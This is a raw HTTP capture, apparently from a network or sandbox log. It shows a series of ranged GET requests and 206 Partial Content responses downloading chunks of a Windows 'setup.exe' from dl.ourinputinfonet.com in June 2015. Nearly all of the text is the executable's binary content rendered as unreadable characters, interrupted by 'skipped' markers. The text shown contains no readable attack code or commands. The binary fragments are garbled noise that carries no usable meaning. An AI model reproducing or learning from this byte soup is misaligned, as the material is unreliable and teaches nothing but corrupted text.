gt;.8F...wx"..Y..w....%.i...H...:........w....3.Y..>CR..?....ll....
........$..0....9....=^.........!..K...}....:5[..z..B.l".do..|.f_GK..9
..... $1...S...>...,...x.$..Q.|.;w.....a26...[Y=.h-.*.!6..G......&g
t;..O.~^CI.RT1...t7.K.........%}......(.....jn...#r...v8e.{[email protected].>
;........0HZ.............Z..L....=}f...'Q...j..>...%.....@.#.Q.u...
...x.F...b. ..7u...{....Mq.8 %|b...V.V!........$..Ty........yKEUT....i
. ...K....u$2X.f..ea.E.....'.pO._ ."....@{.....mJ0............$I..&\Ix
5....F..&d..#..Qx..z..&:..:.}....._.{'..\.ct..7.t......q.../......C/..
.e.(..:.Fb..ZB.vM.1.....J.O.....M...R...X....^...L?.f...7%.z..MZ$.h...
3g.7..O...Wk]...X0.f.$,..m...T..7 I..............*[email protected]\2..\)......7...
I..5.Jc.%..r8./....u...mS..J.....H.|.n.D.u .)....j..gIm.A.T...= ..*...
M(.c...gl.%...N.l."[email protected].*.q..].s..).FcE
tF-.wTi.r../ ...[.......(....zA?....c..p.............".W.........w...!
..4.....%... VQ!..]Ng'%/..m0.B.........ge{}.X..4h..QH5x$.K..X0.A.H.!..
Y.A.2G...H.|..,.Y..=/.....j.>.C....1..R....!e...i....n...qd.....s..
1.....k.u....v.<....^M..e.......`...-z..o..."....h...8b....z43....o
[email protected].#Q'...\....G.Yl !..5.p...-FS-...E[(l...C.5@C. L.$..
Z..m..p.....C.../.L.4...eu..k.......2....%.3....kk.`.b.....%4.......t.
........L..H.t.h.{.&%6.Avz..,.`B...S.wj.Lr.0...E..Y.X.9..AJ..4.../<<< skipped >>>

GET /web/gf/all/setup.exe HTTP/1.1

Range: bytes=5500000-5749999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: dl.ourinputinfonet.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Fri, 19 Jun 2015 06:16:42 GMT

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1434634143"

Last-Modified: Thu, 18 Jun 2015 13:29:03 GMT

Cache-Control: max-age=765

Content-Length: 250000

Content-Range: bytes 5500000-5749999/10834868

Content-Type: application/x-msdownload

X-HW: 1434694598.dop017.am4.t,1434694602.cds037.am4.c

Content-Disposition: attachment; filename="setup.exe"
.Y2.>lQ..U...........$~.....IH.....-........\......rf.....v..'&...~
I.5.Kj .p?..AWB..I.......(D....g......Dt...h.3..W..fm..>...Af(..".*
.G.(Q.-yCJ.X._...#d:[email protected]........\...-6 .....*PL.{-.T...e*.
>.V...7...Yw..8.....V.d..tY.D..%|....Pf..W..q..T.i:.......S......*.
....._.,......u..5`74*.#.....V....i....X...y.KF......V&....t.O.Z.O.j.6
....F..'.U..'.....H...W..r.j.3.U..j.........2.[......y.&n.......hj.\..
.......OS...FfF:..Rc........$#..v...Q..X...Ur0.;T.....9.../.e..t.7..?.
.K..VY......h.]....k.a.o...pLA^.2......Et^........6E.l....V;.u..z.....
S.....-.b.7......s}j.`[email protected]......~.f.-.~}.>If....O.
.t ......5'hS.9...r>...G.p.B.#Q.p....-"&%.w?.u.....nU[] .:.:A.s.(..
4`]."..).......7g......k......z...#.J....F...3[...A..Kr. ..%.....D.Qk.
....`f..Zz..k..)........wT.`...o.._..i.e..q..|.....`......mo...S.V .$.
....(.k.F...Cr:...2..;&.. ....#[email protected].._}...f]..U.z.].kPg.mlu.
..(%.J..;..}.|.?\./....U..B..$.u....:...D..of..({..1...{..1z....)*4.U.
.k.........f..5.........Q.9.!h.4..p..7..._.fz..%...z....GI...e|.. ..."
X../....gc...=n..J.|[email protected]......=.
yn...uM.b.....*.......,......AS_:o.G._/........|...}...2.3..qA..Uw.JB.
.}9...o.4.......tk4...#.m3d...?..N..^......m.E.t.x....;.j.~./P9.-.....
TU.=*......6....{.9......Y>[email protected]..}*>d.E.W....~>.....
..].H,$....V...p.}c..../[.n'.17w.......F..Aj....?...........~../.o....
C..a...M.~R1._.....L.\.....8{.. .R..".u.a!RI\U.\../N.g...F...B;0......
mM2....f..R ......*....['... ...R%[email protected]%...]..}...y%5..>{<<< skipped >>>

GET /web/gf/all/setup.exe HTTP/1.1

Range: bytes=5750000-5999999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: dl.ourinputinfonet.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Fri, 19 Jun 2015 06:16:42 GMT

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1434634143"

Last-Modified: Thu, 18 Jun 2015 13:29:03 GMT

Cache-Control: max-age=765

Content-Length: 250000

Content-Range: bytes 5750000-5999999/10834868

Content-Type: application/x-msdownload

X-HW: 1434694598.dop017.am4.t,1434694602.cds037.am4.c

Content-Disposition: attachment; filename="setup.exe"
......#..*F..ax.{..K.....mJ...TM9..`..[...$V [..N.4.`.E......-.J=..A.r
F!.Z#..%..C.....R.)F...BO.:...38..:...*....K.f...{>-.6...Yz.U.;.Y.i
...;G...ey.n...t..y...nY..I...7.i.l.4..?...}z..:...Ho..%.L6... e...U..
p..u>D.XD..c.s.M.&...c1.f]i....P....UV4......F..&!..;Wf.-..>~e.L
..O...jk..8....y..E.....$y&..."......P......!v..d.EW.... )}.&Zp...{F..
..U.......I.'.{.o....>&...\I......)v..wy...{iQ1...-._..M...#O..27..
.R..^Q#.....^..|X...%..[.4^K......2..8..........8.....Hl..;IjQ.....@..
..N.dl.....C..M;.N)../.C...7...U7...N.(Y....^.>. /i.x./...*..-k...z
?1... ....z....4`Y..S.........X.....T..U.....`.]B...S......4.$...b.b..
..7........f.e0L.9p.i.....(.y...E '.Nb...}.lT.7....<`....Nj..0.|.iY
.Xa..d;.a.....<H.........Ix....|....N&..P...9)?$RYD2Ap.(.P....8S..N
.v.... ..r..U....t...TQ.y..6./@Cf.......k.Q.t~...?...p?.3.L..5....e.,.
Q4..N)L.....-..$..^6:m1.]....Q.......M{r. ..g........A.!:QK6...5...B.#
...{;N.t....R.3""...@m|...rqz..f..Y.....#.L`...d...Q.j..& ..~.8..s4}..
..-..G..T`......k.}@-..[(...........G....3.."<.Ns..:..#Qhl...1He..d
.)[email protected]}.........g..=.;[email protected].(.........B.&_A.d.C
pK.........}......l.f.,.8....-.\..G._.Q.x}8..D....^.E.n....)\.[..Y.>
;..i].g2..h... ...*T9]...a.dK...5y...........ap p..S`..X...iGc....F..o
O.Pq..s.0U..Hq.z.z.......=<.;.O.<. ...Xg...~Z.d......oa.........
/....ykw....9.....=..d.......c.C.W.G..q..t..u.%....b}.....T.b`b......M
.........c.K$.U.J..e.m.....|...d.R....Y............,kZ|e....m....j..-.
j.0.(:.....(.8.C..X..j@{.UvAGZ.....Cu...U....Pa.._.....v...D.])..S<<< skipped >>>

GET /web/gf/all/setup.exe HTTP/1.1

Range: bytes=6000000-6249999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: dl.ourinputinfonet.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Fri, 19 Jun 2015 06:16:42 GMT

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1434634143"

Last-Modified: Thu, 18 Jun 2015 13:29:03 GMT

Cache-Control: max-age=765

Content-Length: 250000

Content-Range: bytes 6000000-6249999/10834868

Content-Type: application/x-msdownload

X-HW: 1434694598.dop017.am4.t,1434694602.cds037.am4.c

Content-Disposition: attachment; filename="setup.exe"
..b..I#..r..F...lq..Z.6 %...g!..P...xi..x.5<$......|U/.r..Y4.......
. .$......Y".....(u..1..(S1..W...\....n.(.K.....6........J.B....k.&?..
.pX.....#.i. .aIW...5.I4`..2.....z}.. V....`K.).....F(....*..G(...Qn.#
.....{..}..".A4.q..i tPA?........!..,.>..%.Q...SB<.S..{.p.D...|!
-..J.:.....}y.pn....J$."q.>.kob.o....z~.D.H5.5..7.A..S..ft,..._.p.\
dK.1.{3....8.).8T.....g...q...Di:....2 [email protected]:>WB."..8...O...D..2.
..*3p.8...d.mq.pTjm...9.....F..'.."T..`..2...S..p...i.S...P..e'....._q
/..l..eW.qlX}|.*..J.".f....]..S....Gu. [email protected]...^t}.....M.......
[......%\..b..%...!..*[email protected]...%sJ..=...;-.....v.......:.?.
.s...Da.E5...?......T.....e....0.a_B.'..j....~..n.m...\....u.z..''.D..
.k.......4.e.c.>m.)........(..4l9K..O|_~M..".............*i[Oo..)..
<3....C{.9.....{...Y..{.H.,S...s..Z......)....,.3....*..qMI..7....h
4az.j...$  o..G..x"!?.=...;.{.{.B....?...0.E.S....: ....h..:..F5s./2'.
.$.......\..1A2.7.ZC...3_.N.'-.q...[uF..6.z.....I.7X..........<...X
.J../x>D.VN..-...JBE.cb.w........zx.......9>.....i.r..P{..a...\.
[email protected].@...(...]@P.. R..4........e7
.o..'......-7...!...... 3.R.I%G.ma..1k..1"y..5.-...$......9*..T...Y4.0
cO....^...c[....3..^..k\|...fA......(('Sh ...t......L.....J.}......X..
W..~Xe....... [..H&0{[email protected]....?..\.&.....*...H...l....
...w...|\D.. .j>x1...i%..>....~..:.Cr...~D.?.x...w..........N...
e..n..*(.P*b.=?-8.. a.:G...Z.D...)u.0...ANF.\.'.<2rG;}..D9...0...Q.
.w.DP ...z ...zc?..........I..@...).i.b!A.....?p..`.s...b..wq..K..<<< skipped >>>

GET /web/gf/all/setup.exe HTTP/1.1

Range: bytes=6250000-6499999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: dl.ourinputinfonet.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Fri, 19 Jun 2015 06:16:42 GMT

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1434634143"

Last-Modified: Thu, 18 Jun 2015 13:29:03 GMT

Cache-Control: max-age=765

Content-Length: 250000

Content-Range: bytes 6250000-6499999/10834868

Content-Type: application/x-msdownload

X-HW: 1434694598.dop017.am4.t,1434694602.cds037.am4.c

Content-Disposition: attachment; filename="setup.exe"
....H.bH....... ..$.. ..u......O.....d..I9...,:...a.........P..Ou2.U.}
.?....&)..I..`..{.K..q.....y.....PR.....%.K.G)H...z....^.$Q..h.\...D.p
.Ds.......2....^9..j..kf.c` ad........H'm[^.V.X.;W..6{.I..._....t?^..-
Sg.Bfz1S>[N.RT.....,m6)d...4.<?(x~..c...Im]-..6....d.f|3. .'..T.
I.%"(.s...............k....n..M...Um{;.!...1[......p..X.sc.k........K.
g!...M\.g."..k...s..).........}......q....F........v..c@...<..7.5..
6:.4w.}`y7r`.g^v"..1....0..H......N.F.Z.C.E.."..@#....20....j........&
lt;'...x..zA.>.5...>..1.(&v........."B.....F.........`...'.8Z.N.
.U......j.../W..=,...\..R#..).....L....}....15lu..f.s..".q~KU.$F..d vP
<...}|.....`f...........o....S.\..?'D"..`.A..:'.2...q`.k..*..&..*.2
...o.....?A...9.l....... ...AO......../.;g.2...{.K...5..~......A7....,
...a.....us,..x.>p..i!..<....0;..1...<.3Z[l.H.q..........kV.V
.D.e.9<rC..]2.....u..>...D..2;uB....S.R.`...z=m.(.I....M..FX_.b.
.....50.\...Sd..r2I...A.S..f...0e....T.c..!u.G...t..T7.z=.r...G.nU..We
/X|.t.b;/....e..0...q...:5.W...o.O.....}.q?.....)....i....%.6......b.R
ui.3.Bl.9~..!E...p..P:..NBB.e..._.T,E..\.h.......>..)XV.Dz...@^.!..
..8.t.5.E,F........wx.o.).G...f.F.".mV...{..P..-....4..d.........B7/.S
4<S.bM..L.t....J.L-$.._d...U..ew..{..X....ccr).2.\.........-...a.dZ
5.4.^.Q.q9L.R.....&B[..v....t...V.Q.w......3.5Oc....l.V....lY1..A..m..
v.g ..8...{.5 ...q..O......"...2{Q-n...B$.~..._R...&A[..d...,w...<.
..[...z.nK.6?.=tl...m.u..............r..v....9.t01.=.q....!P.MW.q.G...
.i'".....0...C....[....vq#..U`......;.t....r..^.....7..V.&..R.x...<<< skipped >>>

GET /web/gf/all/setup.exe HTTP/1.1

Range: bytes=6500000-6749999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: dl.ourinputinfonet.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Fri, 19 Jun 2015 06:16:42 GMT

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1434634143"

Last-Modified: Thu, 18 Jun 2015 13:29:03 GMT

Cache-Control: max-age=765

Content-Length: 250000

Content-Range: bytes 6500000-6749999/10834868

Content-Type: application/x-msdownload

X-HW: 1434694598.dop017.am4.t,1434694602.cds037.am4.c

Content-Disposition: attachment; filename="setup.exe"
.C........\......fI......~.y.O)Ad...b.t.Z.!W^.Z..F.._....CE..^W.G.S/.y
.......%....g......j2.........hF,....#5...6..9:......d.6.......?FX6.1d
..:.a1.........2...h/.[\H....7.....~..*p.....:..1..%5.... ....."].B.Eh
..6X.i...ES...$.?..i....'-.t)F........#.".. ..6t.Do.Mf./'.....tY...L.&
b.Z....~...?.....3~....}..e./?...)>...6b...5...#wsz................
...S.s.F..}.o...e.5H..A....F..)/mp..B"..Q.p.....[N.\jx4..7..7M.}j( .T.
y..k..\.&....vh)......B....rF.Ri.&$Wf..!...r0...zsz...W.....sH4..0.5..
.P..E. ....nqa..C.R*...A.q.u...u'...i'.<rfm...-.F...N.z..S.q.K.9.|.
5.S.N...,2....^S..$.`4}".5hMoi...N...../6...X._.j.k..*....c....D&.....
.Q.....eB..WX.F.....W]....m....y........B.........PyZp....Q.....~5.r'k
.t#..'0w......Z.......}..{!.wm].@R>..S.....kuk...$.......V.o.1.L..Y
.%8.1H..I.... p..yf.Z..m..tn......7....>i......i..9.-.....#.x.....;
............K.g...y-F....Ep...J{`.#.0O.*...y.].U.Z.....Eo;.?.......B..
T7........F-.=.S..f7%P..q....'.......U....0"...6.Q ..x.........}..%..8
....\.... .<.....'.C.xY&.0........k'.a.I...'3.....{.....[].....:...
....w..AM....$.%......{.B.a.=.#<Go..{....q.`......AE?.g...bs.....j.
[email protected]..@.......?.<.5#.....!`.......=.....0...r.m..
.  ...z .a.........,.>*`.]....tC...q..%B .........o....,3.~.E..{.x.
...1.C.hr..1.....=....7.P.ee._.......1...Ve............]..]...b*.B..2.
M...W.....~\...FZ?.?......BI.F ...p....kh........t.....#.....F$...{...
.4U^.V0:3....'..mr..o......9......G..[kE.6t.Qv*O..~....>.$.nv..M.A.
...O............N.V........8.?N1.z:^...{ ..'5".D).~v.`fK9vlX......<<< skipped >>>

GET /web/gf/all/setup.exe HTTP/1.1

Range: bytes=6750000-6999999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: dl.ourinputinfonet.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Fri, 19 Jun 2015 06:16:43 GMT

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1434634143"

Last-Modified: Thu, 18 Jun 2015 13:29:03 GMT

Cache-Control: max-age=764

Content-Length: 250000

Content-Range: bytes 6750000-6999999/10834868

Content-Type: application/x-msdownload

X-HW: 1434694598.dop017.am4.t,1434694603.cds037.am4.c

Content-Disposition: attachment; filename="setup.exe"
.M..].x< .G}.z..Z.......[....W.?.......U.s..r..o."..._......T../...
i>`....[R.e...H.B...._u.Z.gz.|..........w_...k;..(..>h......1n.b
~..!.G.}.F-...8.d.Rh. ......-E..D.t.p..Q.........'..Z;..u?.C.?..V..j..
./e......DT{l....0;...c...JH..'.x$r......8\..N...[j\......>...(a[."
P._...E'.....91Qv.~....~..(i...........<T..~..&......j$..Ss|.(.*&..
[email protected]..)$...s....8@.=B..<)..y&....&..."..................
....<;......7..J..m.pN,t.~....G......0..s........z..]0.. ......4P..
...Q...e61YW6..ay.qX.._)....28..m....?.9. :Fh.....P._..w.P.~.$.... f..
....q3..6..?./.T..{... #........?..!(.z..J..a..'.....n...X.1..%_..S^?.
.m*.g......._|/n..c...Wj...J.K.b..3.$._.....Zx.cm...Z\.:........X.....
.......wA....... .2k[|.Qj...-..`H9..%P>.t....(Gl..b2.p;.\...L.6.o]9
..K....!...{.s..h..t.7.o..PfO.MT.g._x...p...?co.{_M.....d.).CD...d.V..
......X.}p...,].9..X..1q El8.3...>....iP...fDS..t-q...6...KF.F".`..
6...mNG...$.4K<%.pX[n..)K..-.3..(d..b..$...;h0.x...[..0..4. ..G^~..
[email protected].....)..G^.s........@%'..I./X.......6.......jb|...~....."A.v...
kk.`...KW..0..A....v.o/.\...,._..v..J...R.:Wb.<.e.:|.Xl`..R.I<.)
......n...yL.|W.. .y.{a..J&V}.....R.M.gE.; r..6..=.=....D......_......
.rU..........9.../&..B.}."t.P..D.v~.N..D...4!.NZ.....H..[..&.....8..oq
..5...;...v... ..c....2.W9x[..;.M...Yu..k#.r".Y....~...!...b.f.....fA%
.w.\..,`...44q.*Y.J~......yE ........v..G)....,5....jd\D.\I....e[.h..V
...6L.G..r....'!omlH..5E4k....VV.FV.....E.G{s,.?]3. V..S......9IE4 `..
...i].G...]*.ma.?9..4.5.lC.R..9&.Cnb.\..,4.k8?.......R...l.e...Uf?<<< skipped >>>

GET /web/gf/all/setup.exe HTTP/1.1

Range: bytes=7000000-7249999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: dl.ourinputinfonet.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Fri, 19 Jun 2015 06:16:43 GMT

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1434634143"

Last-Modified: Thu, 18 Jun 2015 13:29:03 GMT

Cache-Control: max-age=764

Content-Length: 250000

Content-Range: bytes 7000000-7249999/10834868

Content-Type: application/x-msdownload

X-HW: 1434694598.dop017.am4.t,1434694603.cds037.am4.c

Content-Disposition: attachment; filename="setup.exe"
%...R.[w..3..%.)..)%b......E.ol../....j......~.q..Kg'.~.xZj{?&..4...ZO
.f..Y.i..%....O6.A....&.(7........%..C . .r....5...].%.#.hw...c.L. x.z
......../;.......>.sG.p.M.g......C.@.,.#u."`...v...,B.......;a..P.^
j%.5...TTRc.l4.A.E..T.~....~.........\6...O..a..{.cb.P..$.....NBh...&.
d..5.^.t.n.Q9=;[email protected]...,."....Z.t......r.....R../..i.....
.'cn.._A..g#......v'v.....i.CJ.Y.R......M..lI7.$...4...(.l..G$V!...qft
w...w....i....U.MX.........9.|..Y}....g...9H"......E..*.......F9.0....
.....KE.D.CJ&...s.<.6...."u._.f'.K...'. ".......m.V.....[;...:.F.Vz
./.(.M.B~L....._.-.52..$P.....]........*z....i[..[........-.&...f.P..L
6..*......L.O..(..s!.....-.............gt......J..[.U2.u..".....d...r.
.E..x.ai...............".s..v.......~"s..;....(...\.^..eU.)......0....
.Q..8.p.Z.J.....G......9....TI..].z.........W...............J......c..
!....Suf./......0:....4c...z...d.sI.1..`uL...Gb.J..E%t.v&Pm.t.c>.._
......E.'.h{.9.( .^B6..M...m&.#!r..a...&."..$IfiH ..1BF......i.JOz.n.E
F.!0...........Y..GA.......ha.H......s..............qp..p.....%.z`.L..
.a.Q...].s...M..6.._......U.\}...5.1&O.:.;.,..?..a=X..6..&....)....z6.
....:....%........A.!._...o....T...NY.....s.^.|.....%......a.V. ..yE(.
....5J..Od.....Do..T2Vp.....;7.......}../..W.w.....r..t.Lf........\.23
.4.0f.........0.}..d.. b..)...c.Nxnx....H...FF.m..!.>..a.}...1.....
m...X....... ....`.ad..*.]!.')d(e.#.k.A.........$[..N.....W,..........
.=.tg..pE%X ...o.nZ.u...:[email protected]..`.'...
8.,..d..<~...E....R..]....kV.].. UF,'.n.*S#.......Z$.........W{<<< skipped >>>

GET /web/gf/all/setup.exe HTTP/1.1

Range: bytes=7250000-7499999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: dl.ourinputinfonet.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Fri, 19 Jun 2015 06:16:43 GMT

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1434634143"

Last-Modified: Thu, 18 Jun 2015 13:29:03 GMT

Cache-Control: max-age=764

Content-Length: 250000

Content-Range: bytes 7250000-7499999/10834868

Content-Type: application/x-msdownload

X-HW: 1434694598.dop017.am4.t,1434694603.cds037.am4.c

Content-Disposition: attachment; filename="setup.exe"
..O;...F.M...=%...u`..r..|..B.'!....g...1.t....8..<.0..W.........@(
.@[email protected]\...^.g?R...[.PA.......j~1iq....W.....3XJ...^.Q.{...
.S...&L.X.{..>.^. ......N....F..s.6..^VVv-..Hd.A..|.O.bw.L.9...G...
A...%....../..M.....l..V.i ....{D.{.b!... .....7& .5R.:..|.N=.E.).Q..6
.LE.~4.:...Z.W.o...Hn7....zq..*./.......k.....8....Oc...'s2.E<.t...
<^..e8.)...B.,..%C..j/6../..N.xR....O%.I..%.Y...H-Y...So'C]{..'...V
b..g..h....Z6....V...OR.Y....8ps...^.S..p*...t.T..~(e.......a11...\...
JLd....m..nO`k...\~.0...Z....(e....5.%u.1.m0...B..&.......i7m's.N.9.t.
.....,.aha.w%gG.L..G...2gN.`$..g./..l.ND.#..\.Q)(...x..g.)...2."...~./
....E.7Skrnmr.62....P.../..D....E..cd'..Lt7.}.>x.....Z..{QO...(...Y
-....:.c..1'>.505...&........0g..!W70.;@.6..Q.n...;!......=........
............(......_.R?X.-....6#.[..0.3......6...#:...#^....). ..-.g..
..^.=S.pX...........|hR/RU........_.....&._w.C....M..6....93.<v8..N
fS.........N..k...Y.....v.TX.my.kd.HKU....py...w}.....5AR....@^>...
W."...4...V.P..M...\@..#lE6....5.Fd{.;..}d..G.......-.I.#Q..O.jL...M..
....Q3............T.T..(.:h[4........(.N...*O.c......O...g..!....>.
.~..W.{b...No.4.t.....|B..T...x...a.j..\b..j=o ..\..Qe..?MI.{.z....|f.
.s...t#.On........MqO..f.7.Pzz,F !^~...h.2.....4..~E..W?.kI..u....$C`.
..6o93.y../[email protected].. ...f...6u.O...._.........b.D.J..6........
.......%FpO&3..|Z...".....^..0W8.u....I5B....\.F...T\...4d.l_...o....z
.....2UpT.....G8.k.>..iX..."m....N...R.%..{....0l...k.C...G.|.T. m.
;.....'|....Ad.X...../(ux.d^G..k..y.'.w....md..P-.g.C....?Z ...P5.<<< skipped >>>

GET /web/gf/all/setup.exe HTTP/1.1

Range: bytes=7500000-7749999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: dl.ourinputinfonet.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Fri, 19 Jun 2015 06:16:43 GMT

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1434634143"

Last-Modified: Thu, 18 Jun 2015 13:29:03 GMT

Cache-Control: max-age=764

Content-Length: 250000

Content-Range: bytes 7500000-7749999/10834868

Content-Type: application/x-msdownload

X-HW: 1434694598.dop017.am4.t,1434694603.cds037.am4.c

Content-Disposition: attachment; filename="setup.exe"
..6....L.....v%E.i..J3yI.ot='..<...B.`l.Q........='}.` 'i$.V.....m.
..^..o......T..3...1.~......../...x......~(.y.....(.. .)......%BL..:..
..Fh._ .FWA.....)...$y.O!|..1....).3...M........rb......,..v.>.....
Y.A'.....3J.]...bb........b/...C.......@@[email protected].
i.!....*h{..}.a;$........T!..w...XP.....,../..B......^..E(.):..*..iO..
C2....l....;.._;Z..gZ..O.dP.<*...`....x.........L1.l....*..jJ......
.R......oR..8....bp.!.m..!..'......\F....7..<..l..=9.>..BP.'..R.
..Y.(..l....Y........)...$..;=..g#.A;...A..AV../Vs..%W.j..M .`:o.EztQ.
;..r...:...j.Wd..?.|!...&.0......g=.Y.....i5.m..&.j..-]...^...F..dv.15
k?.T2u.tk.....y.....z..G.8...T.Ogu..i;[email protected]...\&........2.9...^.,
.>.>...,....T...K.p^?.....n,u.SLWN..(..@.|........G.e...B.qE.,b.
.8k......k....Z?..6..GP..}.UaK."q8....'[email protected]..<
;.S...v...2.:y.)nF&....Q....{...u.4v..:..j.......9..xT. ......,..3c..k
zQ.....2.<.......z...~..n.O;..A.4...../[..w..\.g../eZ.I...... ..V._
...={.[..i.=. .MEeL.H..`<.X.j..[*{..A$...BvV...5...2'..\.&. ..h..&g
t;.. 6Xo..H.8.}....BZd.f..<.ej. y3.?.G.......\.1}[.....o.Y.e&N....*
...F..`h.X...=.f.i{.!q.,H!F...;*F.I...I.F.........9.....]...>1..C&l
t;..,..W......c'2..h..&.......G..E.......q...[[email protected]
.N6.&d......$.i...'CX. *B...9.NC.......c...x....O&....WW..........!.N.
7&..:.......R.<....mmv..........c.f.[D..l...@.....@..?.cD..."_t.C.7
ah..aP.F...=.I./...]....oC.z2.J....\,.."l..WT..Y.5..or.....=..&.......
..C.)....w....4.R...`.....t...6w....xQ......I..&.(....A..)8:.1...U<<< skipped >>>

GET /web/gf/all/setup.exe HTTP/1.1

Range: bytes=7750000-7999999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: dl.ourinputinfonet.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Fri, 19 Jun 2015 06:16:43 GMT

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1434634143"

Last-Modified: Thu, 18 Jun 2015 13:29:03 GMT

Cache-Control: max-age=764

Content-Length: 250000

Content-Range: bytes 7750000-7999999/10834868

Content-Type: application/x-msdownload

X-HW: 1434694598.dop017.am4.t,1434694603.cds037.am4.c

Content-Disposition: attachment; filename="setup.exe"
j....l*.8...z2..A-i....y)q.<.2.:.N..............[_.YY.SO..........s
./r9..F.~...1Z&..t9.......L....7...W{... .uq.r;!..6,U.]E....-...|..>
;.".bv..........=.8.,..E.) .{^.!...,n.....j. .TjW.8s.w./.)g.,.."M.h...
...?q..P`.i...{..w7...6...)......x..\D...#..d...........d..q_...r...:.
"...o..........u.......#.~n...TW...a.... ....[......4...<C>.....
 ..!..M...\&...~\SQ.....y...PP.b.........7......nt9....J.......C...D..
@.......V..W.....O.c0....R.... ....&s..X.c.....W.7...uc$.|.Z...).0....
..Ay..e.j.P|.7...e3.#..K ....A...H.%,>.}.n.......(`.fZ..R.... ..H.|
-.{...9..]S[.....06.l...O^.......Mg.hJ......>....G...k....Z.~=.D..?
.J.Rc.....{.F^%!...F..#-3...3.b`:z..).Z......RJ.I..j..._|&{.....[..m..
...0.....WRVr........%y.".{.f......._C..k...%....?..q3.64...p....m.S.z
.aZP..?..>y...5...'f...c.%......J...h..&.....0\N..h.o......._..9=.C
..k)...i....ZL.v.y.bz_7..N.....X.....$....:..........-...5..Nm.%......
..AbJ..L.q`[email protected]}.......L."..\....|..(.(.LC.....k.......ep..&..
.6.........r...tf$'.&mq$.lbf.......c..,.G..w...G.*%~.E......L..n......
..m.......%. '.ad2..#...c...jz.s.N.I..C..:......4%.c.R..&.,q.~...?Ne..
{..J=.,-.y.*.x..}.A.<.u..Y..k.Dp....j`...-A...........TJ.gPbZqP.%`.
....3..;..,..mZ..Rc...........o.....iu..|.............C...tEg.........
[.e:....c.=hQP.T.K...U........}XE...z...lR.L.Q...D.6.s{....n..,.n..R..
i..]D?...s.....!.\o..n..M..;......PEG....o-*3&.".B|.0.k?...l.,..3.MV.s
Ov&.....?0.N.wxR...]4v....C.H...Z..{h..{\...S....P!a..i........0.aoXR 
s&.`........j..w&.......sQ.)....\...&.....f#.J...<.....%.~u.C..<<< skipped >>>

GET /web/gf/all/setup.exe HTTP/1.1

Range: bytes=8000000-8249999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: dl.ourinputinfonet.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Fri, 19 Jun 2015 06:16:44 GMT

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1434634143"

Last-Modified: Thu, 18 Jun 2015 13:29:03 GMT

Cache-Control: max-age=763

Content-Length: 250000

Content-Range: bytes 8000000-8249999/10834868

Content-Type: application/x-msdownload

X-HW: 1434694598.dop017.am4.t,1434694604.cds037.am4.c

Content-Disposition: attachment; filename="setup.exe"
..{ 7>v.T.{..".Xt.............Q".r.*.....&....5gN.9.U.G...T.a.iaZyi
ul.x....-..GP`..q......}m|Y........*Z.).ml[B.e.......=.\.Z.7.f...4..b9
<.e..iI...;.U.}.....(.$e.b.PL.K.a.xv.....TG.FH..Y..).'.yfN1...M.x..
.U..r.......d..B...!.../.&8.V.....d.. .WH)...#....7....=I.|.`.;w..nI9.
j...aVn..4sE8.`Y...1K....b...G..r.1..j......X0.h...b.q1t[A.CV..c_...$.
...-..N...T[...y[n.rf#<S..U..@[email protected]....%L..C.|...QE..
..:..>.=U...JI.......Kz...d&@.>..U]........~..o..u.^.....Q..x."Z
.......L'..$.R./.....o$.W.C..........X".....$.....)$.. ........Fk.h.GG
..^..l{..GJ0...-N...Q[EaT.r^K.SX'0].\....N R...=u2....9.P...We..[\p..5
..u!w....;...]..6........&..5.'. q....F'6:7.Q#.D....w..VW.#;..e../ p..
[email protected]...;Oo..{..r....G.....Uv..  .r9.......2._.CI..M....
..\..b.4..*uOP/5....7:[email protected](...]90.L..R9h.%.........~
....f.CZ....cR*.(<[email protected]<.&.4......... [email protected]..&B..
2...`}D...........2#.....V........J.&s...,...)x1..*..f*..Pz.b0..."g.9L
j..&..U..=.~.....fZL.=..].5W.,[email protected].
p...(....b...t..[>.a5;..lGF....{....1..9.__l.nm....&.....7c.^.<:
